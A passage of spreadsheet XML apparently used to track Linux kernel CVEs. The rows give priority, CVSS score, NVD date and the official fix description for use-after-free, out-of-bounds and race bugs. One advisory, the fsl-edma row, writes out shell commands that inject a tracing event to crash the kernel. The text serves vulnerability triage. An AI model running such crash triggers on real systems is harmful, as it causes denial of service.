      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89941</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Make IIO DMA fence release RCU-safe
The `dma_fence` documentation states that if a custom release
implementation is provided, the `dma_fence` object must be freed in an
RCU-safe way. The current `iio_dma_fence` implementation uses `kfree()`,
which might result in a use-after-free.
Remove the custom `release` implementation. This makes the DMA fence core
fall back to `dma_fence_free()`, which calls `kfree_rcu()` on the fence.
This requires that the fence be the first member of `struct iio_dma_fence`.
Using the default release method for extended DMA fence structures is a
common pattern.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89941</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89942</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Fix potential use-after-free in anonymous buffer release
An anonymous buffer handle holds a reference to the underlying IIO device.
The reference is dropped in the buffer handle's release function. If the
device has been removed, either through unbind or hot-unplug, the buffer
handle might hold the last reference.
The release function takes the mutex for the buffer using a guard, which
means the unlock happens after all the code in the function, including
`iio_device_put()`. If the anonymous buffer holds the last reference this
might free both the IIO device and the buffer, which contains the mutex,
leading to use-after-free when the mutex is unlocked.
Fix this by using a scoped guard just around the buffer dmabuf list access,
making sure the mutex is unlocked before releasing the IIO device.
Version 10 of the patch that introduced this issue used this exact scheme
of first unlocking and then dropping the reference [1]. During review it
was suggested to use a guard instead, and version 11 made that change [2].</t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89942</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89961</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/mm: fix wrong addr_pfn tracking in compound vmemmap population
vmemmap_populate_compound_pages() uses addr_pfn to determine the PFN
offset within a compound page and to decide whether the current vmemmap
slot should be populated as a head page mapping or should reuse a tail
page mapping.
However, addr_pfn is advanced manually in parallel with addr.  The loop
itself progresses in vmemmap address space, so each PAGE_SIZE step in addr
covers PAGE_SIZE / sizeof(struct page) struct page slots.  Since addr_pfn
is compared against nr_pages in data-PFN units, it should advance by the
same number of PFNs.  The existing manual increments do not match that and
therefore do not reliably track the PFN corresponding to the current addr.
As a result, pfn_offset can be computed from the wrong PFN and the code
can make the head/tail decision for the wrong compound-page position.
Fix this by deriving addr_pfn directly from the current vmemmap address
instead of carrying it as loop state.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89961</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89965</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm/btt: reject an arena whose nfree is below the lane count
The BTT info block's nfree field, the number of reserve free blocks, is
read from the medium without validation.  btt_freelist_init() and
btt_rtt_init() size the per-lane freelist[] and rtt[] arrays by nfree,
but the I/O path indexes them by the lane from nd_region_acquire_lane(),
which is bounded by nd_region-&gt;num_lanes (ND_MAX_LANES), not by nfree.
A crafted or foreign arena whose nfree is below the lane count makes
freelist[lane]/rtt[lane] run past the allocation: an out-of-bounds write.
btt.rst documents the nlanes = min(nfree, num_cpus) invariant, which the
code does not currently honor: num_lanes is ND_MAX_LANES regardless of
nfree.  Reject an arena whose nfree is below num_lanes at discovery,
before the per-lane arrays are allocated, enforcing that invariant.</t>
        </is>
      </c>
      <c r="S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89965</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89967</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/migrate_device: avoid out-of-bounds writes for compound folios
migrate_device_range() and migrate_device_pfns() clear the entries
following a compound folio so that the PFN arrays retain their
page-granular representation.
If a compound folio extends beyond the end of the caller-provided range,
the loops clear all following folio entries without limiting them to the
number of slots remaining in the npages-sized array, causing an
out-of-bounds write.
Do not proceed with a compound folio if its page-granular representation
does not fit entirely in the remaining PFN array.  If this happens, drop
any reference and lock acquired for the folio, clear the remaining
entries, and stop collecting.
Observed with a KASAN x86 QEMU kernel using the HMM migrate_anon_huge_zero
selftest.  Closing /dev/hmm_dmirror0 after migrating an anonymous huge
page to device memory exercises:
  dmirror_fops_release()
    -&gt; dmirror_device_evict_chunk()
      -&gt; migrate_device_range()</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89967</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89979</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcm: Fix race between non-atomic ops and trigger-start
We protect the races of the concurrent state transitions between
atomic PCM ops, but the checks between the non-atomic ops (hw_params,
hw_free and prepare) and the atomic ops aren't perfect; there is a
check of the conflicting PCM state at the beginning of hw_params &amp; co,
but the atomic PCM ops can be still issued during the non-atomic PCM
operations.  An example such scenario is that a thread A re-issues the
PREPARE or HW_PARAMS for the already prepared stream, while another
thread B triggers the PCM start in the middle of the prepare
operation.  Although this usually doesn't lead to much serious issues,
it can give some inconsistency as reported by syzkaller (such as
ODEBUG warning).
There are various atomic PCM ops, and basically the only problem is
the PCM start as it operates from the PREPARED state.  Other trigger
commands (stop, etc) are for the running or the other special state,
hence they are filtered as pre-condition.
This patch is for preventing the PCM trigger-start during the non-
atomic operations in order to address the problems above.
Fortunately, the hw_params, hw_free and prepare operations call
snd_pcm_buffer_access_lock(), and this can be used for checking the
concurrent operations at the PCM trigger -- which sets the
runtime-&gt;buffer_accessing to a negative (if possible), so the PCM
trigger just needs to check the runtime-&gt;buffer_accessing value; if
it's negative, it means the concurrent non-atomic PCM ops is running.</t>
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89979</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89985</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
memcg: keep folio's objcg same as its node
memcg_reparent_objcgs() has an inherent assumption that a folio's objcg is
the objcg of the folio's node.  Folio migration across nodes breaks that
assumption: the new folio simply inherits the old folio's objcg while
living on a different node.
Once the assumption is broken, the reparenting of the folio's objcg and
the reparenting of the folio's LRU list are no longer atomic. 
memcg_reparent_objcgs() handles one node per iteration and drops all the
locks in between, so the objcg gets reparented in the iteration for the
objcg's node while the LRU list gets spliced in the iteration for the
folio's node.  Any LRU operation on that folio in between resolves its
lruvec through the objcg, and thus takes the lru_lock of the wrong memcg,
not the lru_lock of the list the folio is actually on.
Fix this by selecting the objcg by folio_nid() at charge time, and by
re-deriving it for the destination node in mem_cgroup_migrate() and
mem_cgroup_replace_folio().</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89985</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89986</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mempolicy: fix sleeping allocation in alloc_pages_bulk_weighted_interleave()
syzbot reported a sleeping function called from invalid context splat in
bucket_table_alloc().
When rhashtable_insert_slow() rehashes the table under rcu_read_lock(), it
calls bucket_table_alloc(..., GFP_ATOMIC | __GFP_NOWARN).  If the bucket
table allocation uses vmalloc, __vmalloc_node_range_noprof() invokes
vm_area_alloc_pages() -&gt; alloc_pages_bulk_mempolicy_noprof() with the
passed GFP_ATOMIC flags.
If the current task has an MPOL_WEIGHTED_INTERLEAVE mempolicy,
alloc_pages_bulk_weighted_interleave() is called and currently hardcodes
GFP_KERNEL when allocating the temporary weights array, triggering a
might_alloc() splat in atomic/RCU contexts.
Pass the gfp flags (masked with GFP_RECLAIM_MASK to strip page-allocator
zone modifiers like __GFP_HIGHMEM) received by
alloc_pages_bulk_weighted_interleave() to kmalloc() instead of hardcoding
GFP_KERNEL.  Since the weights buffer is immediately initialized in full,
kmalloc() is sufficient.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89986</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89988</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kprobes: Protect kprobe_blacklist with RCU
__within_kprobe_blacklist() traverses kprobe_blacklist without holding
kprobe_mutex. When a module is unloaded, kprobe_remove_area_blacklist()
removes blacklist entries and immediately frees them with kfree().
A concurrent call to within_kprobe_blacklist() can therefore dereference
freed memory.
Furthermore, within_kprobe_blacklist() can be called in atomic or
non-preemptible contexts where the sleeping kprobe_mutex cannot be taken.
Protect kprobe_blacklist with RCU. Use guard(rcu)() and
list_for_each_entry_rcu() for traversal, list_add_tail_rcu() for
insertions, list_del_rcu() for deletions, and kfree_rcu() to reclaim
entries safely after a grace period.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89988</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89994</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fsl-edma: tracing: no ptr dereference during log output
The fsl edma events store a pointer to a struct fsl_edma_engine in the
ringbuffer and dereference it when a log entry is printed. At this time,
the pointer may no longer be valid.
Event injection can be used to trigger a crash:
$ cd /sys/kernel/tracing
$ echo 'value = 0' &gt; events/fsl_edma/edma_writeb/inject
$ cat trace
The log output needs only edma-&gt;membase. Add a membase field at the end
of the event and use the new field for log output. Keep the existing
fields for backward compatibility.</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89994</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89997</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm: fix resume-vs-remove race
If the user issues the resume ioctl and the remove ioctl at the same
time, it may be possible that the device is resumed after it is suspended
in __dm_destroy. The result is that the table is destroyed without
calling the postsuspend method.
Dm targets expect that they may be removed only after the postsuspend
method method was called. If we break this expectation, it can cause
misbehavior in various targets. For example - in the dm-integrity target,
the reboot notifier is not unregistered, leading to use-after-free.
Fix this bug by refusing to resume if the device is being destroyed.</t>
        </is>
      </c>
      <c r="S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89997</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89998</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm: fix race when loading and unloading a table
If the userspace calls two concurrent table load ioctls and one of them
succeeds and the other fails, there is a race condition because
dm_setup_md_queue walks &amp;md-&gt;table_devices without any lock. If the walk
races with dm_table_destroy -&gt; free_devices -&gt; dm_put_table_device, there
is access to invalid memory.
Fix this race by extending the lock over the list walk.</t>
        </is>
      </c>
      <c r="S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89998</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90001</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: bpf: serialize device reference release in struct_ops destroy path
__hid_bpf_ops_destroy_device() and hid_bpf_unreg() can race on the
same registration reference, double-putting struct hid_device and
freeing it while hid_destroy_device() still uses it.  Serialize the
remove/NULL decision under hdev-&gt;bpf.prog_list_lock so exactly one
path releases each registration reference: unreg re-checks ops-&gt;hdev
under the lock and returns without putting when the destroy path
already cleared it; all put_device() calls happen after the lock is
dropped, which is safe because a concurrent unreg then observes
ops-&gt;hdev == NULL under the lock.
Background: each successful attach (hid_bpf_ops_reg) acquires one
device reference (hid_get_device()).  Two paths can release it:
- device destruction: hid_destroy_device() -&gt; hid_bpf_destroy_device()
  -&gt; __hid_bpf_ops_destroy_device(), which walks hdev-&gt;bpf.prog_list
  under rcu_read_lock() and drops one reference per attached program;
- BPF link release: bpf map delete (no BPF_F_LINK) synchronously calls
  st_ops-&gt;unreg() -&gt; hid_bpf_unreg(), which drops the reference for
  its own registration.
The coordination handshake (e-&gt;hdev = NULL on the destroy side vs
"if (!hdev) return" on the unreg side) is a TOCTOU check: the two
paths run under different lock domains (rcu_read_lock vs
prog_list_lock), so a concurrent unreg can read ops-&gt;hdev as
non-NULL, block on prog_list_lock, and then proceed while the
destroy traversal executes - both paths then drop the same
reference.  The refcount reaches zero legitimately (each decrement
is individually valid), so no refcount_t saturation fires: the
device is simply freed while the transport is still inside
hid_destroy_device(), and subsequent teardown touches freed memory.
The fix serializes the remove/NULL decision under prog_list_lock on
both sides and moves the destroy-side puts outside the lock.  With
the lock held, plain reads/writes of ops-&gt;hdev are sufficient; no
READ_ONCE/WRITE_ONCE are added, keeping the patch minimal.
Unlocked-read safety: the unlocked read of ops-&gt;hdev at the top of
hid_bpf_unreg() cannot touch a freed device, because the unreg path
itself still holds this registration's reference (released only by
its own hid_put_device() after the lock is dropped), and a destroy
traversal that already cleared ops-&gt;hdev makes the lock-internal
re-check return early without any put.  At most one of the two
paths releases each registration reference.</t>
        </is>
      </c>
      <c r="S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90001</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90002</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
